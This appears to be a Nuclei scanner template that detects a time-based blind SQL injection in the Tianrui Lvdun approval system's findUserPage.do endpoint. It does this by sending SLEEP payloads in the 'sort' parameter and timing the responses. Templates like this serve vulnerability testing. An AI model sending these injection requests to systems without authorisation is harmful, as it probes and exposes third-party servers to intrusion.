id: tianrui-findUserPage_do-sql-time

info:
  name: 天锐绿盾审批系统 findUserPage.do SQL注入漏洞
  author: tianrui
  severity: high
  tags: sql injection

http:
  - raw:
      - |
        POST /trwfe/user/findUserPage.do HTTP/1.1
        Host: {{Hostname}}
        Cookie: JSESSIONID=; lang=zh-CN; sid=
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        userName=&deptId=0&page=1&rows=10&sort=(SELECT * FROM (SELECT(SLEEP(4)))x)
      - |
        POST /trwfe/user/findUserPage.do HTTP/1.1
        Host: {{Hostname}}
        Cookie: JSESSIONID=; lang=zh-CN; sid=
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        userName=&deptId=0&page=1&rows=10&sort=(SELECT * FROM (SELECT(SLEEP(8)))x)
    matchers:
      - type: dsl
        dsl:
          - 'duration_1>=4 && duration_1<=5'  
          - 'duration_2>=8 && duration_2<=9'
        condition: and